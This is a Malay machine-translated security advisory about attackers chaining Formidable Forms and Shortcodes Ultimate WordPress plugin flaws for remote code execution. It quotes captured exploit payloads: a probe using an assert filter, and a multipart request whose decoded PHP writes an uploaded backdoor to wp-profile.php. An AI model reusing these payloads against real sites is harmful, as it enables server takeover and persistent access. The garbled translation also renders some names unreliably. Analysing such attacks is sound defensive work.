Forms Formable / Shortcodes Ultimate Exploits In The Wild

November 25, 2017

Pada hari Isnin, 20 November, kami diberitahu mengenai kelemahan yang menimbulkan risiko keselamatan yang serius apabila Kod pendek dan Borang Buktikan boleh digunakan bersama pada pemasangan WordPress tunggal.

Selama beberapa minggu yang lalu, kami telah melihat peningkatan besar dalam jumlah ujian permintaan yang berniat jahat untuk kehadiran dua plugin WordPress popular. Kedua-dua plugin ini mengandungi kerentanan risiko sederhana berasingan yang, apabila digabungkan, membenarkan penyerang jauh melaksanakan kod jahat pada pelayan yang mendasarinya.

Plugin Formula Terbaik dan Formidable Plugin bertanggungjawab untuk menggerakkan lebih dari 700 ribu dan 200 ribu laman web masing-masing – menimbulkan ancaman yang ketara kepada mana-mana tapak yang menggunakan sambungan popular.

Latar Belakang

Bentuk Formidable mengandungi beberapa kelemahan yang telah ditetapkan dalam versi 2.05.02 dan 2.05.03, seperti diterangkan oleh Klikki Oy . Salah satu kerentanan ini membenarkan pelawat untuk memaksa sebuah laman web untuk menghasilkan kod pendek, satu ciri lazimnya diperuntukkan secara eksklusif untuk pengguna dengan akses kepada panel pentadbiran.

Kod pendek menembusi kelemahan Pelaksanaan Kod Jauh yang mempengaruhi versi lebih rendah daripada 5.0.1 yang membolehkan pengguna dengan keistimewaan tertentu menjalankan fungsi PHP seperti sistem arahan pada pelayan melalui shortcode tersuai.

Gabungan kedua-dua kelemahan menjadikan setiap pelawat memanfaatkan bug Shortcodes Ultimate dan kompromi laman web sepenuhnya

Exploits In The Wild

Terdapat pelaku buruk yang sudah mengimbas untuk laman web yang mengandungi dua plugin yang lemah ini. Kami telah menyedari bahawa bilangan permintaan yang menyasarkan gabungan ini telah meletup dalam beberapa hari kebelakangan.

Adalah sangat menarik bahawa lonjakan permintaan bermula dengan tiba-tiba pada 13 November, tarikh yang sama laporan asal untuk kelemahan ini telah dipublikasikan. Kami melihat satu set pengimbasan IP yang sangat tidak sekata untuk kelemahan ini:
Melihat cepat pada penyerang muatan yang digunakan memberikan wawasan yang sangat baik mengenai metodologi mereka. Kami melihat banyak permintaan siasatan, seperti yang berikut dalam badan POST ini:

 form = {% 27contact-form% 27} & before_html =% 5Bsu_meta% 0akey = 1% 20post_id = 1% 2
0default =% 27print ( x22  x5Cx65  x5Cx72  x5Cx72  x5Cx6F  x5Cx72  x5Cx5F  x5Cx38
x5Cx35  x5Cx33  x22)% 27% 20filter =% 27assert% 27% 5D 

Coretan ini mempunyai misi yang sangat khusus: ia direka bentuk untuk mencetak " error_853 " hanya jika laman web ini menggunakan versi terdedah dari kedua-dua Formidable Forms dan Shortcode Plugin Ultimate, yang menunjukkan eksploitasi berjaya

Ini adalah satu kaedah biasa yang digunakan oleh penyerang untuk menjejaki tapak mana yang terdedah dan mana yang tidak, supaya mereka dapat mengekalkan jumlah orang yang mengeksploitasi kemudiannya.

Kami juga melihat beberapa percubaan eksploitasi yang aktif:

 ---------- aafdb155dba7
Pelupusan Kandungan: data bentuk; name = "form"
{'Borang hubungan'}
---------- aafdb155dba7
Pelupusan Kandungan: data bentuk; name = "before_html"
[su_meta key=1 post_id=1 default=’create_function(“”,urldecode(“%7d%3b%
24%66%3d%62%61%73%65%36%34%5f%64%65%63%6f%64%65%28%24%5f%50%4f%53%54%5b%
22%66%69%6c%65%5f%6e%61%6d%65%22%5d%29%3b%24%68%3d%66%6f%70%65%6e%28%24%
66%2c%22%77%22%29%3b%66%77%72%69%74%65%28%24%68%2c%62%61%73%65%36%34%5f%
64%65%63%6f%64%65%28%66%69%6c%65%5f%67%65%74%5f%63%6f%6e%74%65%6e%74%73%
28%24%5f%46%49%4c%45%53%5b%22%66%69%6c%65%5f%75%70%22%5d%5b%22%74%6d%70%
5f%6e%61%6d%65%22%5d%29%29%29%3b%66%63%6c%6f%73%65%28%24%68%29%3b%63%68%
6d%6f%64%28%24%66%2c%30%36%34%34%29%3b%2f%2f”))’ filter=’assert’]
---------- aafdb155dba7
Pelupusan Kandungan: data bentuk; name = "file_up"; filename = "file.txt"
Jenis Kandungan: aplikasi / oktet-strim
PD9waHANCg0KLyoqDQogKiBTZXRzIHVw ... (string base64 besar)
---------- aafdb155dba7
Pelupusan Kandungan: data bentuk; name = "file_name"
Li4vd3AtcHJvZmlsZS5waHA =
---------- aafdb155dba7- 

Serangan yang digunakan di sini agak mudah. Sekiranya kita menodekodkan apa yang ada dalam panggilan fungsi urlencode (), kita dapat skrip berikut:

}; $ f = base64_decode ($ _ POST [“file_name”]); $ h = fopen ($ f, "w"); fwrite ($ h,
base64_decode (file_get_contents ($ _ FILES [“file_up”] [“tmp_name”])));
fclose ($ h); chmod ($ f, 0644); // 

Skrip ini pada dasarnya mengambil fail yang dimuat naik di file_up dan menulis kandungan yang didekodkan di lokasi yang ditentukan oleh parameter $ _ POST [“file_name”] . Ini menyimpan pintu belakang dan membenarkan penyerang mengekalkan akses backend ke pelayan yang mendasarinya.

Kebanyakan permintaan yang ada di sini menunjukkan bahawa penyerang menyimpan fail ini di wp-profile.php pada akar tapak WordPress yang dijangkiti.

Kemas kini Sekarang

Seperti yang anda lihat, penyerang secara aktif mencari isu ini di alam liar. Sekiranya anda menggunakan versi terdedah dari plugin ini, kami sangat mengesyorkan anda mengemas kininya sekarang!

Sekiranya anda tidak dapat melakukan ini, kami sangat mengesyorkan memanfaatkan [SucuriFirewall atau teknologi setara untuk mendapatkannya.



Sumber

Bacaan WordPress Yang Lebih Menarik!

Service Finder – Provider and Business Listing WordPress Theme
Themeforest,
Themeforest,

Service Finder – Provider and Business Listing WordPress Theme

Pembuat Rojak - January 18, 2018

Perkhidmatan Pencari WordPress Tema adalah tema perniagaan dan perkhidmatan direktori yang canggih. Pembekal Perniagaan dan Perkhidmatan dari pelbagai kategori boleh…

Advanced Activity Widget
Plugins,
2 views
Plugins,
2 views

Advanced Activity Widget

Pembuat Rojak - January 18, 2018

Widget Aktiviti Lanjutan - Plugin WordPress Widget Aktiviti Lanjutan Menambah kotak widget tab bertema resposnive ke bar sisi anda yang…

Pereka Masuk Logam: Gambaran Keseluruhan Terperinci dan Kajian
Elegant Themes,
3 views
Elegant Themes,
3 views

Pereka Masuk Logam: Gambaran Keseluruhan Terperinci dan Kajian

Pembuat Rojak - January 18, 2018

Halaman log masuk WordPress mudah digunakan, dan mereka dengan selamat. Satu-satunya kelemahan adalah bahawa mereka semua melihat betul-betul yang sama…

Leave a Comment

Your email address will not be published.